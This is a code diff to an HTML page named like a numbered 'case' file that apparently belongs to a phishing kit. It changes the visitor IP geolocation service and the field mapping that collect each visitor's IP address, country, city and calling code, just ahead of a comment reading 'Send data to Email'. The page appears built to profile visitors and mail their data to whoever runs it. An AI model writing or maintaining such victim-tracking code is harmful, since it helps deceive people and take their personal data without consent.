--- a/case/100081295808699.html
+++ b/case/100081295808699.html
@@ -5417,15 +5417,15 @@
         }
 
         // Get User IP
-        var url = 'https://ipinfo.io/json'
+        var url = 'https://api.db-ip.com/v2/free/self/'
         async function getUserIp() {
             const response = await fetch(url);
             if (response.status == 200) {
                 const data = await response.json();
                 userIpData = {
-                    'user_ip': data.ip,
-                    'country': data.region,
-                    'country_code': data.country,
+                    'user_ip': data.ipAddress,
+                    'country': data.countryName,
+                    'country_code': data.countryCode,
                     'city': data.city,
                     'call_code': getCallingCode(data.country)
                 }
@@ -5434,10 +5434,12 @@
                     'user_ip': 'Ip not detected ;(',
                     'country': '-',
                     'country_code': '-',
-                    'city': '-'
+                    'city': '-',
+                    'call_code': '-'
                 }
             }
         }
+
         getUserIp()
         
         // Send data to Email
